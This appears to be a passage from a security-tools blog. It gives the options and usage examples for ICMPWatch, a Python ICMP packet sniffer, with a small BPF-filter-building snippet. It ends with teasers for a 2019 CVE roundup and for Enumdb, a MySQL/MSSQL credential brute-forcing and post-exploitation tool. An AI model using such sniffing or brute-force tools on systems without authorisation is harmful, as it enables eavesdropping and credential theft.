  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.
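One plausible way to combine the --filter, --type, --src-ip and --dst-ip options is to fold them into a single BPF expression. The sketch below does that with standard pcap-filter syntax. Whether ICMPWatch builds its filter this way or filters packets after capture is not stated here, so treat build_filter as a hypothetical helper.

```python
def build_filter(base="icmp", icmp_type=None, src_ip=None, dst_ip=None):
    """Combine the optional constraints into one BPF filter string."""
    parts = [base]
    if icmp_type is not None:
        # icmp[icmptype] reads the ICMP type field in pcap-filter syntax.
        parts.append(f"icmp[icmptype] == {icmp_type}")
    if src_ip:
        parts.append(f"src host {src_ip}")
    if dst_ip:
        parts.append(f"dst host {dst_ip}")
    return " and ".join(parts)


default_filter = build_filter()
narrow_filter = build_filter(
    icmp_type=8, src_ip="192.168.1.10", dst_ip="192.168.1.20"
)
print(default_filter)
print(narrow_filter)
```

The resulting string could be passed wherever a BPF filter is accepted, for example as the value of the -f option.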

Examples

  • Capture ICMP packets on the "eth0" interface:
python ICMPWatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python ICMPWatch.py -i eth0 -o icmp_results.txt
  • Filter by source and destination IP:
python ICMPWatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filter ICMP Echo Requests:
python ICMPWatch.py -i eth0 --type 8
  • Save captured packets to a pcap file:
python ICMPWatch.py -i eth0 -c captured_packets.pcap


Top 5 Critical CVEs Vulnerability from 2019 That Every CISO Must Patch Before He Gets Fired !

The number of vulnerabilities continues to increase so much that the technical teams in charge of the patch management find themselves drowning in a myriad of critical and urgent tasks. Therefore we have taken the time to review the profile of the most critical vulnerabilities & issues that impacted year 2019. After this frenzy during […]

Enumdb Beta – Brute Force MySQL and MSSQL Databases

Enumdb is a brute-force and post-exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials. By...
